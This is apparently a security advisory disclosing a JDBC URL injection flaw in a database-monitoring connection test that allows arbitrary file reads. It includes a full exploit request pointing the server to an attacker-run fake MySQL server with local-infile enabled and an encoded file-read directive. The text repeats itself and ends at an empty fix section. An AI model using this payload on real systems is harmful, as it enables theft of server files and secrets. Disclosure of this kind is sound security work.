JDBC Injection in Database Monitoring. Allow users to read any file
Details
Allowing custom URLs in select database monitoring leads us to use arbitrary parameters to cause files to be read
Use the following tool https://github.com/4ra1n/mysql-fake-server
Execute java -jar fake-mysql-cli-0.0.4.jar on vps
Select edit database and put the following payload into the url
POST /api/database/testConnect HTTP/1.1
{"id":"c4f72159fd87484a90d33c4a7a8619d1","name":"数据库","jdbcUrl":"jdbc:mysql://xxxx:3308/test?allowLoadLocalInfile=true","userName":"base64ZmlsZXJlYWRfRDpcYW41ZXJcZmxhZy50eHQ=","pwd":"root","createBy":"admin","createTime":"2023-12-27 10:51:22","updateBy":"admin","updateTime":"2023-12-27 10:51:22"}
Then click Test to send the request and our tool will output the following message
At the same time, the directory where we start the tool generates the ./fake-server-files directory, which contains the contents of the files we read
Impact
It allows an attacker to read any file on the server, including sensitive information, leading to data leakage and serious security threats
Summary
JDBC Injection in Database Monitoring. Allow users to read any file
Details
Allowing custom URLs in select database monitoring leads us to use arbitrary parameters to cause files to be read Use the following tool https://github.com/4ra1n/mysql-fake-server Execute
java -jar fake-mysql-cli-0.0.4.jaron vps Select edit database and put the following payload into the urlThen click Test to send the request and our tool will output the following message At the same time, the directory where we start the tool generates the ./fake-server-files directory, which contains the contents of the files we read
Impact
It allows an attacker to read any file on the server, including sensitive information, leading to data leakage and serious security threats
Fix sample code: